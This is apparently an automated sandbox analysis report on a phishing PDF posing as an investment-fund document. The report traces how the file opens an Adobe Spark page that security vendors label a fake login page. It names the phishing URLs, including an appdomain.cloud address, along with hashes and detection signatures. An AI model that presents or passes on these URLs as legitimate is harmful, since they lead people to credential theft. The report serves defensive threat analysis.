Loading ...

Play interactive tourEdit tour

Analysis Report Tribeca Investment Partners - Funds.pdf

Overview

General Information

Sample Name:Tribeca Investment Partners - Funds.pdf
Analysis ID:433116
MD5:1f514a862d7eb6e2c4952b67a97a4e56
SHA1:4a4d5f759793397ebdc72679895ef62f6a74fed3
SHA256:6c796e1a57333bc61e0a45a6398da2393ce0529304b57abc8d22125862a02211
Infos:

Most interesting Screenshot:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found potential malicious PDF (bad image similarity)
Yara detected HtmlPhish29
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
HTML title does not match URL
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • AcroRd32.exe (PID: 5092 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\Users\user\Desktop\Tribeca Investment Partners - Funds.pdf' MD5: B969CF0C7B2C443A99034881E8C8740A)
    • AcroRd32.exe (PID: 5960 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\Users\user\Desktop\Tribeca Investment Partners - Funds.pdf' MD5: B969CF0C7B2C443A99034881E8C8740A)
    • RdrCEF.exe (PID: 3340 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16514043 MD5: 9AEBA3BACD721484391D15478A4080C7)
      • RdrCEF.exe (PID: 4952 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1696,14583101347345561594,418495030725437647,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=18176514141952179124 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=18176514141952179124 --renderer-client-id=2 --mojo-platform-channel-handle=1664 --allow-no-sandbox-job /prefetch:1 MD5: 9AEBA3BACD721484391D15478A4080C7)
      • RdrCEF.exe (PID: 4944 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --field-trial-handle=1696,14583101347345561594,418495030725437647,131072 --disable-features=VizDisplayCompositor --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --lang=en-US --gpu-preferences=KAAAAAAAAACAAwABAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --service-request-channel-token=14323790637429607960 --mojo-platform-channel-handle=1780 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 MD5: 9AEBA3BACD721484391D15478A4080C7)
      • RdrCEF.exe (PID: 3260 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1696,14583101347345561594,418495030725437647,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=15500690304138507742 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=15500690304138507742 --renderer-client-id=4 --mojo-platform-channel-handle=1868 --allow-no-sandbox-job /prefetch:1 MD5: 9AEBA3BACD721484391D15478A4080C7)
      • RdrCEF.exe (PID: 6328 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1696,14583101347345561594,418495030725437647,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=4408287619177528861 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=4408287619177528861 --renderer-client-id=5 --mojo-platform-channel-handle=1872 --allow-no-sandbox-job /prefetch:1 MD5: 9AEBA3BACD721484391D15478A4080C7)
      • RdrCEF.exe (PID: 6492 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1696,14583101347345561594,418495030725437647,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=4271642722203936314 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=4271642722203936314 --renderer-client-id=6 --mojo-platform-channel-handle=2204 --allow-no-sandbox-job /prefetch:1 MD5: 9AEBA3BACD721484391D15478A4080C7)
    • iexplore.exe (PID: 1968 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' https://spark.adobe.com/page/GG8mUEsjQvSUh/ MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 5624 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1968 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\GG8mUEsjQvSUh[1].htmJoeSecurity_HtmlPhish_29Yara detected HtmlPhish_29Joe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\GG8mUEsjQvSUh[1].htmJoeSecurity_HtmlPhish_29Yara detected HtmlPhish_29Joe Security

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus detection for URL or domainShow sources
      Source: https://spark.adobe.com/page/GG8mUEsjQvSUh/?page-mode=staticSlashNext: Label: Fake Login Page type: Phishing & Social Engineering
      Source: https://xinviaoafinabatizx.us-south.cf.appdomain.cloud/?bbre=zoxsazxSlashNext: Label: Fake Login Page type: Phishing & Social Engineering
      Source: https://spark.adobe.com/page/GG8mUEsjQvSUh/SlashNext: Label: Fake Login Page type: Phishing & Social Engineering

      Phishing:

      barindex
      Yara detected HtmlPhish29Show sources
      Source: Yara matchFile source: 642294.0.links.csv, type: HTML
      Source: Yara matchFile source: 642294.2.links.csv, type: HTML
      Source: Yara matchFile source: 642294.pages.csv, type: HTML
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\GG8mUEsjQvSUh[1].htm, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\GG8mUEsjQvSUh[1].htm, type: DROPPED
      Source: https://spark.adobe.com/page/GG8mUEsjQvSUh/HTTP Parser: Title: Auric Partners does not match URL
      Source: https://spark.adobe.com/page/GG8mUEsjQvSUh/HTTP Parser: Title: Auric Partners does not match URL
      Source: https://spark.adobe.com/page/GG8mUEsjQvSUh/HTTP Parser: Title: Auric Partners does not match URL
      Source: https://spark.adobe.com/page/GG8mUEsjQvSUh/HTTP Parser: Title: Auric Partners does not match URL
      Source: https://spark.adobe.com/page/GG8mUEsjQvSUh/HTTP Parser: No <meta name="author".. found
      Source: https://spark.adobe.com/page/GG8mUEsjQvSUh/HTTP Parser: No <meta name="author".. found
      Source: https://spark.adobe.com/page/GG8mUEsjQvSUh/HTTP Parser: No <meta name="author".. found
      Source: https://spark.adobe.com/page/GG8mUEsjQvSUh/HTTP Parser: No <meta name="author".. found
      Source: https://spark.adobe.com/page/GG8mUEsjQvSUh/HTTP Parser: No <meta name="copyright".. found
      Source: https://spark.adobe.com/page/GG8mUEsjQvSUh/HTTP Parser: No <meta name="copyright".. found
      Source: https://spark.adobe.com/page/GG8mUEsjQvSUh/HTTP Parser: No <meta name="copyright".. found
      Source: https://spark.adobe.com/page/GG8mUEsjQvSUh/HTTP Parser: No <meta name="copyright".. found
      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
      Source: unknownHTTPS traffic detected: 13.225.74.123:443 -> 192.168.2.3:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.225.74.123:443 -> 192.168.2.3:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.224.195.109:443 -> 192.168.2.3:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.224.195.109:443 -> 192.168.2.3:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.224.195.109:443 -> 192.168.2.3:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.224.195.109:443 -> 192.168.2.3:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.224.195.109:443 -> 192.168.2.3:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.216.105.77:443 -> 192.168.2.3:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.216.105.77:443 -> 192.168.2.3:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 169.47.124.25:443 -> 192.168.2.3:49758 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 169.47.124.25:443 -> 192.168.2.3:49759 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.145.59:443 -> 192.168.2.3:49761 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.145.59:443 -> 192.168.2.3:49762 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.1.195:443 -> 192.168.2.3:49764 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.1.195:443 -> 192.168.2.3:49763 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.123.175:443 -> 192.168.2.3:49766 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.123.175:443 -> 192.168.2.3:49765 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.224.187.69:443 -> 192.168.2.3:49770 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.224.187.69:443 -> 192.168.2.3:49771 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.148.64:443 -> 192.168.2.3:49774 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.148.64:443 -> 192.168.2.3:49775 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.3:49776 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.3:49777 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 63.33.31.50:443 -> 192.168.2.3:49778 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 63.33.31.50:443 -> 192.168.2.3:49779 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 15.236.176.210:443 -> 192.168.2.3:49780 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 15.236.176.210:443 -> 192.168.2.3:49781 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.225.74.37:443 -> 192.168.2.3:49782 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.225.74.37:443 -> 192.168.2.3:49783 version: TLS 1.2
      Source: Joe Sandbox ViewIP Address: 169.47.124.25 169.47.124.25
      Source: Joe Sandbox ViewIP Address: 151.101.1.195 151.101.1.195
      Source: Joe Sandbox ViewIP Address: 151.101.1.195 151.101.1.195
      Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
      Source: Joe Sandbox ViewJA3 fingerprint: 3faf2df7ab96c36419c31725cb1fa7d6
      Source: unsupported[1].htm.24.drString found in binary or memory: <a href="https://www.facebook.com/AdobeSpark" target="_blank" data-analytics-context="footer" data-type="facebook" equals www.facebook.com (Facebook)
      Source: scripts[1].js0.24.drString found in binary or memory: if ($a.href.startsWith('https://www.facebook.')) { equals www.facebook.com (Facebook)
      Source: scripts[1].js0.24.drString found in binary or memory: if ($a.href.startsWith('https://www.linkedin.com')) { equals www.linkedin.com (Linkedin)
      Source: scripts[1].js0.24.drString found in binary or memory: if ($a.href.startsWith('https://www.youtube.com')) { equals www.youtube.com (Youtube)
      Source: unknownDNS traffic detected: queries for: page.adobespark-assets.com
      Source: AcroRd32.exe, 00000002.00000002.373401937.0000000008A2D000.00000002.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: AcroRd32.exe, 00000002.00000002.373401937.0000000008A2D000.00000002.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
      Source: AcroRd32.exe, 00000002.00000002.373401937.0000000008A2D000.00000002.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
      Source: AcroRd32.exe, 00000002.00000002.373401937.0000000008A2D000.00000002.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
      Source: AcroRd32.exe, 00000002.00000002.373908461.0000000009350000.00000004.00000001.sdmpString found in binary or memory: http://cipa.jp/exif/1.0/
      Source: AcroRd32.exe, 00000002.00000002.373908461.0000000009350000.00000004.00000001.sdmpString found in binary or memory: http://cipa.jp/exif/1.0/%
      Source: AcroRd32.exe, 00000002.00000002.373908461.0000000009350000.00000004.00000001.sdmpString found in binary or memory: http://cipa.jp/exif/1.0/(15)
      Source: AcroRd32.exe, 00000002.00000002.373401937.0000000008A2D000.00000002.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
      Source: AcroRd32.exe, 00000002.00000002.373401937.0000000008A2D000.00000002.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
      Source: AcroRd32.exe, 00000002.00000002.373401937.0000000008A2D000.00000002.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
      Source: AcroRd32.exe, 00000002.00000002.373401937.0000000008A2D000.00000002.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
      Source: AcroRd32.exe, 00000002.00000002.373401937.0000000008A2D000.00000002.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: AcroRd32.exe, 00000002.00000002.373401937.0000000008A2D000.00000002.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
      Source: AcroRd32.exe, 00000002.00000002.373401937.0000000008A2D000.00000002.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
      Source: AcroRd32.exe, 00000002.00000002.373401937.0000000008A2D000.00000002.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
      Source: m-web-77674361[1].js.24.drString found in binary or memory: http://feross.org
      Source: chrome[1].js.24.drString found in binary or memory: http://github.com/janl/mustache.js
      Source: AcroRd32.exe, 00000002.00000002.384245575.000000000B4DA000.00000004.00000001.sdmpString found in binary or memory: http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/
      Source: AcroRd32.exe, 00000002.00000002.384245575.000000000B4DA000.00000004.00000001.sdmpString found in binary or memory: http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/v
      Source: AcroRd32.exe, 00000002.00000002.384245575.000000000B4DA000.00000004.00000001.sdmpString found in binary or memory: http://iptc.org/std/Iptc4xmpExt/2008-02-29/
      Source: AcroRd32.exe, 00000002.00000002.384245575.000000000B4DA000.00000004.00000001.sdmpString found in binary or memory: http://iptc.org/std/Iptc4xmpExt/2008-02-29/d
      Source: publish.combined.fp-67aad4c89568b23c662905b8b4fd16bd[1].js.24.drString found in binary or memory: http://jedwatson.github.io/classnames
      Source: chrome[1].js.24.drString found in binary or memory: http://mathiasbynens.be/demo/url-regex
      Source: m-unsupported-88cd3215[1].js.24.drString found in binary or memory: http://medialize.github.io/URI.js/
      Source: AcroRd32.exe, 00000002.00000002.387053876.000000000D211000.00000004.00000001.sdmpString found in binary or memory: http://ns.a
      Source: AcroRd32.exe, 00000002.00000002.384245575.000000000B4DA000.00000004.00000001.sdmpString found in binary or memory: http://ns.useplus.org/ldf/xmp/1.0/
      Source: AcroRd32.exe, 00000002.00000002.384245575.000000000B4DA000.00000004.00000001.sdmpString found in binary or memory: http://ns.useplus.org/ldf/xmp/1.0/K$F
      Source: AcroRd32.exe, 00000002.00000002.373401937.0000000008A2D000.00000002.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: AcroRd32.exe, 00000002.00000002.373401937.0000000008A2D000.00000002.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0H
      Source: AcroRd32.exe, 00000002.00000002.373401937.0000000008A2D000.00000002.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0I
      Source: AcroRd32.exe, 00000002.00000002.373401937.0000000008A2D000.00000002.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0O
      Source: rbi5aua[1].js1.24.drString found in binary or memory: http://typekit.com/eulas/00000000000000000000ffd9
      Source: vtg4qoo[1].js0.24.drString found in binary or memory: http://typekit.com/eulas/0000000000000000000132df
      Source: vtg4qoo[1].js0.24.drString found in binary or memory: http://typekit.com/eulas/0000000000000000000132e1
      Source: vtg4qoo[1].js0.24.drString found in binary or memory: http://typekit.com/eulas/0000000000000000000132e3
      Source: rbi5aua[1].js1.24.drString found in binary or memory: http://typekit.com/eulas/0000000000000000000158d3
      Source: rbi5aua[1].js1.24.drString found in binary or memory: http://typekit.com/eulas/0000000000000000000158d4
      Source: rbi5aua[1].js1.24.drString found in binary or memory: http://typekit.com/eulas/0000000000000000000158d6
      Source: rbi5aua[1].js1.24.drString found in binary or memory: http://typekit.com/eulas/0000000000000000000158d7
      Source: rbi5aua[1].js1.24.drString found in binary or memory: http://typekit.com/eulas/0000000000000000000158d8
      Source: rbi5aua[1].js1.24.drString found in binary or memory: http://typekit.com/eulas/0000000000000000000158d9
      Source: rbi5aua[1].js1.24.drString found in binary or memory: http://typekit.com/eulas/00000000000000000001705b
      Source: vtg4qoo[1].js0.24.drString found in binary or memory: http://typekit.com/eulas/0000000000000000000176ff
      Source: vtg4qoo[1].js0.24.drString found in binary or memory: http://typekit.com/eulas/000000000000000000017701
      Source: vtg4qoo[1].js0.24.drString found in binary or memory: http://typekit.com/eulas/000000000000000000017703
      Source: vtg4qoo[1].js0.24.drString found in binary or memory: http://typekit.com/eulas/000000000000000000017706
      Source: rbi5aua[1].js1.24.drString found in binary or memory: http://typekit.com/eulas/000000000000000000017709
      Source: pps7abe[1].css.24.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9aee45
      Source: pps7abe[1].css.24.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9aee47
      Source: onz5gap[1].js0.24.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b3068
      Source: onz5gap[1].js0.24.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b3f83
      Source: pps7abe[1].css.24.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b3f84
      Source: onz5gap[1].js0.24.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b3f85
      Source: pps7abe[1].css.24.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b3f86
      Source: onz5gap[1].js0.24.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b3f88
      Source: onz5gap[1].js0.24.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b3f8a
      Source: pps7abe[1].css.24.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b3f8c
      Source: marvelcommon-51100480[1].js.24.drString found in binary or memory: http://underscorejs.org/LICENSE
      Source: AcroRd32.exe, 00000002.00000002.384245575.000000000B4DA000.00000004.00000001.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/extension/
      Source: AcroRd32.exe, 00000002.00000002.384245575.000000000B4DA000.00000004.00000001.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/field#
      Source: AcroRd32.exe, 00000002.00000002.384083181.000000000B423000.00000004.00000001.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/id/
      Source: AcroRd32.exe, 00000002.00000002.384245575.000000000B4DA000.00000004.00000001.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/property#
      Source: AcroRd32.exe, 00000002.00000002.384245575.000000000B4DA000.00000004.00000001.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/schema#
      Source: AcroRd32.exe, 00000002.00000002.384245575.000000000B4DA000.00000004.00000001.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/type#
      Source: AcroRd32.exe, 00000002.00000002.387053876.000000000D211000.00000004.00000001.sdmpString found in binary or memory: http://www.aiim.org/pdfe/ns/id/
      Source: AcroRd32.exe, 00000002.00000002.387053876.000000000D211000.00000004.00000001.sdmpString found in binary or memory: http://www.aiim.org/pdfe/ns/id/F
      Source: AcroRd32.exe, 00000002.00000002.387053876.000000000D211000.00000004.00000001.sdmpString found in binary or memory: http://www.aiim.org/pdfe/ns/id/y
      Source: scripts[1].js0.24.dr, marvelcommon-51100480[1].js.24.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: AcroRd32.exe, 00000002.00000002.373401937.0000000008A2D000.00000002.00000001.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
      Source: chrome[1].js.24.drString found in binary or memory: http://www.iport.it)
      Source: AcroRd32.exe, 00000002.00000002.384083181.000000000B423000.00000004.00000001.sdmpString found in binary or memory: http://www.npes.org/pdfx/ns/id/
      Source: AcroRd32.exe, 00000002.00000002.384083181.000000000B423000.00000004.00000001.sdmpString found in binary or memory: http://www.npes.org/pdfx/ns/id/D
      Source: AcroRd32.exe, 00000002.00000002.384083181.000000000B423000.00000004.00000001.sdmpString found in binary or memory: http://www.npes.org/pdfx/ns/id/_
      Source: m-unsupported-88cd3215[1].js.24.drString found in binary or memory: http://www.opensource.org/licenses/mit-license
      Source: marvelcommon-51100480[1].js.24.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.html
      Source: AcroRd32.exe, 00000002.00000002.366941342.0000000007B70000.00000002.00000001.sdmpString found in binary or memory: http://www.osmf.org/default/1.0%http://www.osmf.org/mediatype/default
      Source: AcroRd32.exe, 00000002.00000002.366941342.0000000007B70000.00000002.00000001.sdmpString found in binary or memory: http://www.osmf.org/drm/default
      Source: AcroRd32.exe, 00000002.00000002.366941342.0000000007B70000.00000002.00000001.sdmpString found in binary or memory: http://www.osmf.org/elementId%http://www.osmf.org/temporal/embedded$http://www.osmf.org/temporal/dyn
      Source: AcroRd32.exe, 00000002.00000002.366941342.0000000007B70000.00000002.00000001.sdmpString found in binary or memory: http://www.osmf.org/layout/anchor
      Source: AcroRd32.exe, 00000002.00000002.366941342.0000000007B70000.00000002.00000001.sdmpString found in binary or memory: http://www.osmf.org/layout/padding%http://www.osmf.org/layout/attributes
      Source: AcroRd32.exe, 00000002.00000002.366941342.0000000007B70000.00000002.00000001.sdmpString found in binary or memory: http://www.osmf.org/region/target#http://www.osmf.org/layout/renderer#http://www.osmf.org/layout/abs
      Source: AcroRd32.exe, 00000002.00000002.366941342.0000000007B70000.00000002.00000001.sdmpString found in binary or memory: http://www.osmf.org/subclip/1.0
      Source: AcroRd32.exe, 00000002.00000002.366941342.0000000007B70000.00000002.00000001.sdmpString found in binary or memory: http://www.quicktime.com.Acrobat
      Source: AcroRd32.exe, 00000002.00000002.387053876.000000000D211000.00000004.00000001.sdmpString found in binary or memory: https://.OKCancelEdit
      Source: AcroRd32.exe, 00000002.00000002.387053876.000000000D211000.00000004.00000001.sdmpString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/
      Source: AcroRd32.exe, 00000002.00000002.387053876.000000000D211000.00000004.00000001.sdmpString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/TY
      Source: AcroRd32.exe, 00000002.00000002.384922126.000000000B633000.00000004.00000001.sdmpString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload/
      Source: AcroRd32.exe, 00000002.00000002.384922126.000000000B633000.00000004.00000001.sdmpString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload/4
      Source: AcroRd32.exe, 00000002.00000002.387053876.000000000D211000.00000004.00000001.sdmpString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/pY
      Source: AcroRd32.exe, 00000002.00000002.387053876.000000000D211000.00000004.00000001.sdmpString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/y
      Source: AcroRd32.exe, 00000002.00000002.387053876.000000000D211000.00000004.00000001.sdmpString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/yY
      Source: RC881683c91a4d4caaa3e05264c5d96242-file.min[1].js.24.drString found in binary or memory: https://ade0164.d41.co/sync/
      Source: {135EBDC5-CADC-11EB-90E4-ECF4BB862DED}.dat.23.drString found in binary or memory: https://adobe.demdex.net/dest5.html?d_nsid=0
      Source: unsupported[1].htm.24.drString found in binary or memory: https://adobespark.uservoice.com
      Source: en-US_bundle-6a358124[1].js.24.drString found in binary or memory: https://adobespark.zendesk.com/hc/en-us/articles/218956027
      Source: en-US_bundle-6a358124[1].js.24.drString found in binary or memory: https://adobespark.zendesk.com/hc/en-us/articles/219243657
      Source: en-US_bundle-6a358124[1].js.24.drString found in binary or memory: https://adobespark.zendesk.com/hc/en-us/articles/219243657-Can-students-use-Adobe-Spark-
      Source: login[2].htm.24.dr, unsupported[1].htm.24.drString found in binary or memory: https://adobespark.zendesk.com/hc/en-us/categories/202688167-Adobe-Spark
      Source: unsupported[1].htm.24.drString found in binary or memory: https://adobespark.zendesk.com/hc/en-us/requests/new
      Source: resume[1].htm.24.drString found in binary or memory: https://adobesparkpost.app.link/8n80l2HauZ
      Source: invoice[1].htm.24.drString found in binary or memory: https://adobesparkpost.app.link/Wm9lz3B4tZ
      Source: logo[1].htm.24.drString found in binary or memory: https://adobesparkpost.app.link/g8sk4xb8AV
      Source: express[1].htm.24.drString found in binary or memory: https://adobesparkpost.app.link/jsoIbkwCVeb
      Source: express[1].htm.24.drString found in binary or memory: https://adobesparkpost.app.link/nfQW2NoCVeb
      Source: AcroRd32.exe, 00000002.00000002.387234083.000000000D30C000.00000004.00000001.sdmpString found in binary or memory: https://api.echosign.com
      Source: AcroRd32.exe, 00000002.00000002.387234083.000000000D30C000.00000004.00000001.sdmpString found in binary or memory: https://api.echosign.com3252:1m
      Source: AcroRd32.exe, 00000002.00000002.387053876.000000000D211000.00000004.00000001.sdmpString found in binary or memory: https://api.echosign.comRL
      Source: express[1].htm.24.drString found in binary or memory: https://apps.apple.com/us/app/adobe-spark-post-create-stunning/id1051937863
      Source: login[2].htm.24.drString found in binary or memory: https://assets.adobedtm.com
      Source: RC036830be72f242959c7b9ca66cef0c85-file.min[1].js.24.drString found in binary or memory: https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RC036830be72f242959c7b9ca66cef0c8
      Source: RC5e5d1b9fe0a942c38190dc2199529941-file.min[1].js.24.drString found in binary or memory: https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RC5e5d1b9fe0a942c38190dc219952994
      Source: RC6f46e43fa6d44dbeb45cc5801ffded0e-file.min[1].js.24.drString found in binary or memory: https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RC6f46e43fa6d44dbeb45cc5801ffded0
      Source: RC881683c91a4d4caaa3e05264c5d96242-file.min[1].js.24.drString found in binary or memory: https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RC881683c91a4d4caaa3e05264c5d9624
